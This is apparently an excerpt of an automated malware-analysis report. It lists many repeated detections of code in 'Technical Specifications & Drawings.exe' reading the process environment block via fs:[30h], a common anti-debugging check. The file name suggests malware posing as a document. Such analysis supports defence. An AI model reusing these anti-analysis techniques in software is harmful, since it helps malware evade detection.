          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D4BAD mov eax, dword ptr fs:[00000030h]4_2_017D4BAD
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D4BAD mov eax, dword ptr fs:[00000030h]4_2_017D4BAD
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D4BAD mov eax, dword ptr fs:[00000030h]4_2_017D4BAD
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01878B58 mov eax, dword ptr fs:[00000030h]4_2_01878B58
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D2397 mov eax, dword ptr fs:[00000030h]4_2_017D2397
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DB390 mov eax, dword ptr fs:[00000030h]4_2_017DB390
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B1B8F mov eax, dword ptr fs:[00000030h]4_2_017B1B8F
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B1B8F mov eax, dword ptr fs:[00000030h]4_2_017B1B8F
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E927A mov eax, dword ptr fs:[00000030h]4_2_017E927A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9240 mov eax, dword ptr fs:[00000030h]4_2_017A9240
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9240 mov eax, dword ptr fs:[00000030h]4_2_017A9240
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9240 mov eax, dword ptr fs:[00000030h]4_2_017A9240
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9240 mov eax, dword ptr fs:[00000030h]4_2_017A9240
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E4A2C mov eax, dword ptr fs:[00000030h]4_2_017E4A2C
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E4A2C mov eax, dword ptr fs:[00000030h]4_2_017E4A2C
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]4_2_017CA229
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]4_2_017CA229
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]4_2_017CA229
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]4_2_017CA229
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]4_2_017CA229
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]4_2_017CA229
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]4_2_017CA229
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]4_2_017CA229
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]4_2_017CA229
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C3A1C mov eax, dword ptr fs:[00000030h]4_2_017C3A1C
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A5210 mov eax, dword ptr fs:[00000030h]4_2_017A5210
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A5210 mov ecx, dword ptr fs:[00000030h]4_2_017A5210
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A5210 mov eax, dword ptr fs:[00000030h]4_2_017A5210
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A5210 mov eax, dword ptr fs:[00000030h]4_2_017A5210
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AAA16 mov eax, dword ptr fs:[00000030h]4_2_017AAA16
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AAA16 mov eax, dword ptr fs:[00000030h]4_2_017AAA16
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B8A0A mov eax, dword ptr fs:[00000030h]4_2_017B8A0A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186AA16 mov eax, dword ptr fs:[00000030h]4_2_0186AA16
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186AA16 mov eax, dword ptr fs:[00000030h]4_2_0186AA16
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D2AE4 mov eax, dword ptr fs:[00000030h]4_2_017D2AE4
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D2ACB mov eax, dword ptr fs:[00000030h]4_2_017D2ACB
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BAAB0 mov eax, dword ptr fs:[00000030h]4_2_017BAAB0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BAAB0 mov eax, dword ptr fs:[00000030h]4_2_017BAAB0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DFAB0 mov eax, dword ptr fs:[00000030h]4_2_017DFAB0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186EA55 mov eax, dword ptr fs:[00000030h]4_2_0186EA55
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01834257 mov eax, dword ptr fs:[00000030h]4_2_01834257
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A52A5 mov eax, dword ptr fs:[00000030h]4_2_017A52A5
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A52A5 mov eax, dword ptr fs:[00000030h]4_2_017A52A5
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A52A5 mov eax, dword ptr fs:[00000030h]4_2_017A52A5
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A52A5 mov eax, dword ptr fs:[00000030h]4_2_017A52A5
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A52A5 mov eax, dword ptr fs:[00000030h]4_2_017A52A5
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0185B260 mov eax, dword ptr fs:[00000030h]4_2_0185B260
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0185B260 mov eax, dword ptr fs:[00000030h]4_2_0185B260
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01878A62 mov eax, dword ptr fs:[00000030h]4_2_01878A62
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DD294 mov eax, dword ptr fs:[00000030h]4_2_017DD294
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DD294 mov eax, dword ptr fs:[00000030h]4_2_017DD294
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]4_2_01862D82
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]4_2_01862D82
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]4_2_01862D82
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]4_2_01862D82
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]4_2_01862D82
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]4_2_01862D82
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]4_2_01862D82
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CC577 mov eax, dword ptr fs:[00000030h]4_2_017CC577
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CC577 mov eax, dword ptr fs:[00000030h]4_2_017CC577
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018705AC mov eax, dword ptr fs:[00000030h]4_2_018705AC
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018705AC mov eax, dword ptr fs:[00000030h]4_2_018705AC
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C7D50 mov eax, dword ptr fs:[00000030h]4_2_017C7D50
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E3D43 mov eax, dword ptr fs:[00000030h]4_2_017E3D43
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D4D3B mov eax, dword ptr fs:[00000030h]4_2_017D4D3B
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D4D3B mov eax, dword ptr fs:[00000030h]4_2_017D4D3B
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D4D3B mov eax, dword ptr fs:[00000030h]4_2_017D4D3B
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AAD30 mov eax, dword ptr fs:[00000030h]4_2_017AAD30
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826DC9 mov eax, dword ptr fs:[00000030h]4_2_01826DC9
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826DC9 mov eax, dword ptr fs:[00000030h]4_2_01826DC9
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826DC9 mov eax, dword ptr fs:[00000030h]4_2_01826DC9
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826DC9 mov ecx, dword ptr fs:[00000030h]4_2_01826DC9
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826DC9 mov eax, dword ptr fs:[00000030h]4_2_01826DC9
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826DC9 mov eax, dword ptr fs:[00000030h]4_2_01826DC9
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]4_2_017B3D34
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]4_2_017B3D34
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]4_2_017B3D34
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]4_2_017B3D34
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]4_2_017B3D34
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]4_2_017B3D34
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]4_2_017B3D34
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]4_2_017B3D34
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]4_2_017B3D34
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]4_2_017B3D34
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]4_2_017B3D34
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]4_2_017B3D34
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]4_2_017B3D34
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186FDE2 mov eax, dword ptr fs:[00000030h]4_2_0186FDE2
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186FDE2 mov eax, dword ptr fs:[00000030h]4_2_0186FDE2
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186FDE2 mov eax, dword ptr fs:[00000030h]4_2_0186FDE2
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186FDE2 mov eax, dword ptr fs:[00000030h]4_2_0186FDE2
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01858DF1 mov eax, dword ptr fs:[00000030h]4_2_01858DF1
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BD5E0 mov eax, dword ptr fs:[00000030h]4_2_017BD5E0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BD5E0 mov eax, dword ptr fs:[00000030h]4_2_017BD5E0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01878D34 mov eax, dword ptr fs:[00000030h]4_2_01878D34
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0182A537 mov eax, dword ptr fs:[00000030h]4_2_0182A537
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186E539 mov eax, dword ptr fs:[00000030h]4_2_0186E539
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01823540 mov eax, dword ptr fs:[00000030h]4_2_01823540
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01853D40 mov eax, dword ptr fs:[00000030h]4_2_01853D40
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D1DB5 mov eax, dword ptr fs:[00000030h]4_2_017D1DB5
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D1DB5 mov eax, dword ptr fs:[00000030h]4_2_017D1DB5
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D1DB5 mov eax, dword ptr fs:[00000030h]4_2_017D1DB5
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D35A1 mov eax, dword ptr fs:[00000030h]4_2_017D35A1
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DFD9B mov eax, dword ptr fs:[00000030h]4_2_017DFD9B
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DFD9B mov eax, dword ptr fs:[00000030h]4_2_017DFD9B
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A2D8A mov eax, dword ptr fs:[00000030h]4_2_017A2D8A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A2D8A mov eax, dword ptr fs:[00000030h]4_2_017A2D8A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A2D8A mov eax, dword ptr fs:[00000030h]4_2_017A2D8A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A2D8A mov eax, dword ptr fs:[00000030h]4_2_017A2D8A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A2D8A mov eax, dword ptr fs:[00000030h]4_2_017A2D8A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D2581 mov eax, dword ptr fs:[00000030h]4_2_017D2581
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D2581 mov eax, dword ptr fs:[00000030h]4_2_017D2581
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D2581 mov eax, dword ptr fs:[00000030h]4_2_017D2581
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D2581 mov eax, dword ptr fs:[00000030h]4_2_017D2581
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h]4_2_017DAC7B
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h]4_2_017DAC7B
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h]4_2_017DAC7B
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h]4_2_017DAC7B
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h]4_2_017DAC7B
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h]4_2_017DAC7B
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h]4_2_017DAC7B
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h]4_2_017DAC7B
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h]4_2_017DAC7B
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h]4_2_017DAC7B
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h]4_2_017DAC7B
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]4_2_01864496
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]4_2_01864496
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]4_2_01864496
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]4_2_01864496
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]4_2_01864496
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]4_2_01864496
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]4_2_01864496
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]4_2_01864496
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]4_2_01864496
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]4_2_01864496
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]4_2_01864496
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]4_2_01864496
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]4_2_01864496
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C746D mov eax, dword ptr fs:[00000030h]4_2_017C746D
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DA44B mov eax, dword ptr fs:[00000030h]4_2_017DA44B
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01878CD6 mov eax, dword ptr fs:[00000030h]4_2_01878CD6
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DBC2C mov eax, dword ptr fs:[00000030h]4_2_017DBC2C
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826CF0 mov eax, dword ptr fs:[00000030h]4_2_01826CF0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826CF0 mov eax, dword ptr fs:[00000030h]4_2_01826CF0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826CF0 mov eax, dword ptr fs:[00000030h]4_2_01826CF0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018614FB mov eax, dword ptr fs:[00000030h]4_2_018614FB
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]4_2_01861C06
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]4_2_01861C06
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]4_2_01861C06
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]4_2_01861C06
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]4_2_01861C06
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]4_2_01861C06
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]4_2_01861C06
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]4_2_01861C06
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]4_2_01861C06
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]4_2_01861C06
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]4_2_01861C06
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]4_2_01861C06
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]4_2_01861C06
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]4_2_01861C06
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826C0A mov eax, dword ptr fs:[00000030h]4_2_01826C0A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826C0A mov eax, dword ptr fs:[00000030h]4_2_01826C0A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826C0A mov eax, dword ptr fs:[00000030h]4_2_01826C0A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826C0A mov eax, dword ptr fs:[00000030h]4_2_01826C0A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0187740D mov eax, dword ptr fs:[00000030h]4_2_0187740D
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0187740D mov eax, dword ptr fs:[00000030h]4_2_0187740D
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0187740D mov eax, dword ptr fs:[00000030h]4_2_0187740D
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183C450 mov eax, dword ptr fs:[00000030h]4_2_0183C450
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183C450 mov eax, dword ptr fs:[00000030h]4_2_0183C450
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B849B mov eax, dword ptr fs:[00000030h]4_2_017B849B
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01827794 mov eax, dword ptr fs:[00000030h]4_2_01827794
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01827794 mov eax, dword ptr fs:[00000030h]4_2_01827794
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01827794 mov eax, dword ptr fs:[00000030h]4_2_01827794
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BFF60 mov eax, dword ptr fs:[00000030h]4_2_017BFF60
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BEF40 mov eax, dword ptr fs:[00000030h]4_2_017BEF40
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CB73D mov eax, dword ptr fs:[00000030h]4_2_017CB73D
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CB73D mov eax, dword ptr fs:[00000030h]4_2_017CB73D
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DE730 mov eax, dword ptr fs:[00000030h]4_2_017DE730
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A4F2E mov eax, dword ptr fs:[00000030h]4_2_017A4F2E
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A4F2E mov eax, dword ptr fs:[00000030h]4_2_017A4F2E
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CF716 mov eax, dword ptr fs:[00000030h]4_2_017CF716
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DA70E mov eax, dword ptr fs:[00000030h]4_2_017DA70E
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DA70E mov eax, dword ptr fs:[00000030h]4_2_017DA70E
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0187070D mov eax, dword ptr fs:[00000030h]4_2_0187070D
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0187070D mov eax, dword ptr fs:[00000030h]4_2_0187070D
